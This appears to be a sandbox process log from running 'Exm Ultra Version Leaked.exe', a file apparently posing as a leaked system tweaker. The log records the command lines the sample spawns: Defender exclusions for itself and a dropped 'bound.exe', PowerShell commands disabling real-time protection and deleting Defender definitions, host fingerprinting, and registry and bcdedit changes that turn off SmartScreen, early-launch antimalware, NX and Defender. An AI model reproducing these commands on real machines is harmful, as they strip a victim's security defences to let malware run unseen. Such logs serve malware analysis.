"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=6256 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5572 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5924 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5432 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4884 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\EXM_Leaked.rar"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6448 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x30c 0x4c4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ff9d0222e98,0x7ff9d0222ea4,0x7ff9d0222eb0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2040 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2248 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2680 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4380 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4380 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe

"C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4428 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=4564 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4996 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe

"C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5288 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5316 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5432 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\SYSTEM32\cmd.exe

cmd /c "Fn Opti.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe'

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5728 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4660 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5796 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\timeout.exe

timeout /t 2

C:\Windows\system32\timeout.exe

timeout /t 2

C:\Windows\system32\fsutil.exe

fsutil behavior query memoryusage

C:\Windows\system32\fsutil.exe

fsutil behavior set memoryusage 2

C:\Windows\system32\bcdedit.exe

bcdedit /set increaseuserva 8000

C:\Windows\system32\ipconfig.exe

ipconfig /release

C:\Windows\system32\ipconfig.exe

ipconfig /renew

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\system32\netsh.exe

netsh winsock reset

C:\Windows\system32\netsh.exe

netsh int tcp set global chimney=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global autotuninglevel=normal

C:\Windows\system32\netsh.exe

netsh int tcp set supplemental

C:\Windows\system32\netsh.exe

netsh int tcp set global dca=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global netdma=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global congestionprovider=ctcp

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="StopThrottling" dir=in

C:\Windows\system32\bcdedit.exe

bcdedit /set allowedinmemorysettings 0

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformclock

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set tscsyncpolicy Enhanced

C:\Windows\system32\bcdedit.exe

bcdedit /set debug No

C:\Windows\system32\bcdedit.exe

bcdedit /set isolatedcontext No

C:\Windows\system32\bcdedit.exe

bcdedit /set pae ForceEnable

C:\Windows\system32\bcdedit.exe

bcdedit /set bootmenupolicy Legacy

C:\Windows\system32\bcdedit.exe

bcdedit /set usefirmwarepcisettings No

C:\Windows\system32\bcdedit.exe

bcdedit /set sos Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set disableelamdrivers Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set quietboot Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set x2apicpolicy Enable

C:\Windows\system32\bcdedit.exe

bcdedit /set vsmlaunchtype Off

C:\Windows\system32\bcdedit.exe

bcdedit /set usephysicaldestination No

C:\Windows\system32\bcdedit.exe

bcdedit /set ems No

C:\Windows\system32\bcdedit.exe

bcdedit /set firstmegabytepolicy UseAll

C:\Windows\system32\bcdedit.exe

bcdedit /set configaccesspolicy Default

C:\Windows\system32\bcdedit.exe

bcdedit /set linearaddress57 optin

C:\Windows\system32\bcdedit.exe

bcdedit /set noumex Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set bootems No

C:\Windows\system32\bcdedit.exe

bcdedit /set graphicsmodedisabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set extendedinput Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set highestmode Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set forcefipscrypto No

C:\Windows\system32\bcdedit.exe

bcdedit /set perfmem 0

C:\Windows\system32\bcdedit.exe

bcdedit /set configflags 0

C:\Windows\system32\bcdedit.exe

bcdedit /set uselegacyapicmode No

C:\Windows\system32\bcdedit.exe

bcdedit /set onecpu No

C:\Windows\system32\bcdedit.exe

bcdedit /set halbreakpoint No

C:\Windows\system32\bcdedit.exe

bcdedit /set forcelegacyplatform No

C:\Windows\system32\bcdedit.exe

bcdedit /set allowedinmemorysettings 0

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformclock

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set tscsyncpolicy Enhanced

C:\Windows\system32\bcdedit.exe

bcdedit /set debug No

C:\Windows\system32\bcdedit.exe

bcdedit /set isolatedcontext No

C:\Windows\system32\bcdedit.exe

bcdedit /set pae ForceEnable

C:\Windows\system32\bcdedit.exe

bcdedit /set bootmenupolicy Legacy

C:\Windows\system32\bcdedit.exe

bcdedit /set usefirmwarepcisettings No

C:\Windows\system32\bcdedit.exe

bcdedit /set sos Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set disableelamdrivers Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set quietboot Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set x2apicpolicy Enable

C:\Windows\system32\bcdedit.exe

bcdedit /set vsmlaunchtype Off

C:\Windows\system32\bcdedit.exe

bcdedit /set usephysicaldestination No

C:\Windows\system32\bcdedit.exe

bcdedit /set ems No

C:\Windows\system32\bcdedit.exe

bcdedit /set firstmegabytepolicy UseAll

C:\Windows\system32\bcdedit.exe

bcdedit /set configaccesspolicy Default

C:\Windows\system32\bcdedit.exe

bcdedit /set linearaddress57 optin

C:\Windows\system32\bcdedit.exe

bcdedit /set noumex Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set bootems No

C:\Windows\system32\bcdedit.exe

bcdedit /set graphicsmodedisabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set extendedinput Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set highestmode Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set forcefipscrypto No

C:\Windows\system32\bcdedit.exe

bcdedit /set perfmem 0

C:\Windows\system32\bcdedit.exe

bcdedit /set configflags 0

C:\Windows\system32\bcdedit.exe

bcdedit /set uselegacyapicmode No

C:\Windows\system32\bcdedit.exe

bcdedit /set onecpu No

C:\Windows\system32\bcdedit.exe

bcdedit /set halbreakpoint No

C:\Windows\system32\bcdedit.exe

bcdedit /set forcelegacyplatform No

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformclock no

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set tscsyncpolicy Enhanced

C:\Windows\system32\bcdedit.exe

bcdedit /set disableelamdrivers Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set vsmlaunchtype Off

C:\Windows\system32\bcdedit.exe

bcdedit /set firstmegabytepolicy UseAll

C:\Windows\system32\bcdedit.exe

bcdedit /set forcefipscrypto No

C:\Windows\system32\bcdedit.exe

bcdedit /set perfmem 0

C:\Windows\system32\bcdedit.exe

bcdedit /set configflags 0

C:\Windows\system32\bcdedit.exe

bcdedit /set tscsyncpolicy Enhanced

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set nx AlwaysOff

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set vsmlaunchtype Off

C:\Windows\system32\bcdedit.exe

bcdedit /set forcefipscrypto No

C:\Windows\system32\bcdedit.exe

bcdedit /timeout 2

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformclock no

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set nx optout

C:\Windows\system32\bcdedit.exe

bcdedit /set bootux disabled

C:\Windows\system32\bcdedit.exe

bcdedit /set bootmenupolicy standard

C:\Windows\system32\bcdedit.exe

bcdedit /set hypervisorlaunchtype off

C:\Windows\system32\bcdedit.exe

bcdedit /set tpmbootentropy ForceDisable

C:\Windows\system32\bcdedit.exe

bcdedit /set quietboot yes

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "restrictanonymous" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "restrictanonymoussam" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CloudContent" /v "DisableWindowsSpotlightFeatures" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "LastActiveClick" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "EnableBalloonTips" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarGlomLevel" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "DisableThumbnailCache" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "SeparateProcess" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "ConfirmFileDelete" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisableThumbnailsOnNetworkFolders" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "TaskbarNoNotification" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveSearch" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveTrack" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveTypeAutoRun" /t REG_DWORD /d "221" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLowDiskSpaceChecks" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "NoWindowMinimizingShortcuts" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /t REG_SZ /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "CompositionPolicy" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\LanmanServer\Parameters" /v "SizReqBuf" /t REG_DWORD /d "16384" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" /v "VisualFXSetting" /t REG_DWORD /d "3" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\CursorShadow" /v "DefaultApplied" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\DropShadow" /v "DefaultApplied" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\MenuAnimation" /v "DefaultApplied" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\TaskbarAnimations" /v "DefaultApplied" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "AutoApproveOSDumps" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "DontSendAdditionalData" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v "ShowUI" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\PCHealth\ErrorReporting" /v "ShowUI" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseHoverTime" /t REG_SZ /d "100" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "RunStartupScriptSync" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer" /v "GlobalAssocChangedCounter" /t REG_DWORD /d "91" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWebOverMeteredConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortanaAboveLock" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

